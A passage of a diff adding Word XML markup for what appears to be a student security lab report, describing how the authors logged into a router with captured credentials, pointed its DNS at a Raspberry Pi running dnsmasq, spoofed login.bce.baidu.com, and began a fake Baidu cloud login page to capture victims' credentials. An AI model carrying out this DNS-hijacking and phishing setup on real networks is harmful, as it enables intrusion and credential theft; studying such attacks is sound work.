+        </w:rPr>
+        <w:t>Segment 4_1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>C, Segment 4_1-D, Segment 4_1-E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>As we got the username and the password of the origin AP (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Fr</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>om segment 3-B, 3-C), we break into the router management interface of original AP and change the DNS settings.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>rimary DNS 192.168.1.102</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>econdary DNS 192.168.1.02</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Then, all devices connected to the origin AP will make DNS query on raspberry Pi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>We reboot the router to make the settings take effect.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>After setting the router, we establish the DNS server on raspberry Pi by using “dnsmasq” tools:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>nsmasq -C dnsmasq.conf -d</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>he content of dnsmasq.conf is</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>cache-size=0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>interface=eth0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>server=8.8.8.8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>address=/login.bce.baidu.com/192.168.1.102</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>log-queries</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">listen-address=127.0.0.1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Therefore, all DNS query except “login.bce.baidu.com” will redirect to Google official DNS. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We create a fake login webpage replace the original </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>“login.bce.baidu.com”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and make the victim login with credentials via our fake login page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>he login page is:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;!DOCTYPE html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;html lang="en"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;meta charset="UTF-8"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">    &lt;title&gt;Baidu smart cloud&lt;/title&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;/head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>&lt;body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;div align="center"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        &lt;h1&gt;Baidu smart cloud&lt;/h1&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="2"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>&lt;h2&gt;this is only for demo&lt;/h1&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
